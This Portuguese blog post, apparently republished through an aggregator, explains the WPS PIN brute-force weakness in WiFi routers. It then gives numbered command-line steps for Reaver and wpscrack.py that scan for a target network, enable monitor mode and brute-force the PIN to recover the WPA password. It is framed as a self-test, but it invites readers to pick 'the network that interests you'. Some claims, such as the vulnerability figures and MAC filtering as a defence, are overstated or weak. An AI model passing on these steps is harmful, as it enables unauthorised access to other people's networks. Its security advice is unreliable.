Get Even More Visitors To Your Blog, Upgrade To A Business Listing >>

Crackar a password de qualquer rede WiFi WPA em poucas horas!

São bem conhecidas há muitos anos as vulnerabilidades das chaves de rede Wifi WEP no entanto as chaves WPA eram consideradas muito seguras, mesmo praticamente impossíveis de crackar... No entanto isso mudou! Um grupo de e-chicoespertos descobriu um método que torna possível crackar em poucas horas qualquer password com encriptação WPA e mais de 90% dos routers são vulneráveis! Sim o seu router também deve ser vulnerável! porque não o testa?



O método explora uma funcionalidade que surgiu nos routers nos últimos anos para facilitar a configuração da internet nos vários dispositivos que temos em casa chamada "Wifi Protected Setup (WPS)". Se calhar já se cruzou com o WPS quando configura a sua internet no computador e em vez de ter de escrever a password é lhe dada a possibilidade de escrever só um pequeno e prático PIN. Para facilitar a vida as pessoas, a maioria dos routers permite testes sucessivos de "WPS pin" errados sem bloquear o acesso. Este novo método de hack de redes explora essa vulnerabilidade aplicando um ataque "brute force" ao pin, uma vez conseguido este pin o router oferece ao cracker a password da rede WiFi independetemente da qualidade da password usada ou do método de encriptação... Isto permite que a vasta maioria das rede WiFi sejam crackadas em poucas horas (2 a 10h dependendo no programa usado).

Já há programas disponíveis para aplicar facilmente este método e as más notícias para quem quer manter a sua rede segura é que entre os routers vendidos nos últimos anos não há praticamente routers seguros. Desligar a opção de usar o WPS pin não resolve o problema!!!

Quer descobrir se o seu router é vulnerável? Precisa de:
  • Acesso ao sistema operativo Linux (pode executar o linux a partir do windows com uma virtual machine)
  • Precisa de instalar no Linux os seguintes programas: aircrack-ng, python-pycryptopp, python-scapy, libpcap-dev 
  • As ferramentas para WPS crack são: Reaper (suporta todos os routers); wpscrack (mais rápido mas penas suporta algumas marcas de routers que incluem a maioria dos routers usados pela MEO e ZON)
Depois vá um terminal de linha de comando dependendo do programa que vai usar siga esta instruções:

Reaver

  1. unzip reaver-1.3.tar.gz
  2.  cd reaver-1.3
  3. ./configure && make && sudo make install
  4. (Procure a rede que lhe interessa e copie o MAC address  (XX:XX:XX:XX:XX:XX) para depois usar no ponto 6)
    sudo iwlist scan wlan0
  5. sudo airmon-ng start wlan0
  6. reaver -i mon0 -b -vv
  7. Esperar até ter a password...

wpscrack.py

  1. chmod +x wpscrack.py
  2. (Procure a rede que lhe interessa e copie o MAC address  (XX:XX:XX:XX:XX:XX) para depois usar no ponto 5)
    sudo iwlist scan wlan0
  3. ip link show wlan0 | awk ‘/ether/ {print $2}’
  4. sudo airmon-ng start wlan0
  5. wpscrack.py –iface mon0 –client –bssid –ssid -v
  6. Esperar até ter a password...
Como pode ver é muito fácil... uma das coisas que pode fazer para se proteger é limitar o acesso à sua rede apenas aos MAC address dos seus equipamentos configurando isso no setup do router (também é possível tornear mas torna o hack da sua rede mais difícil).


This post first appeared on E-ChicoEsperto, please read the originial post: here

Share the post

Crackar a password de qualquer rede WiFi WPA em poucas horas!

×

Subscribe to E-chicoesperto

Get updates delivered right to your inbox!

Thank you for your subscription

×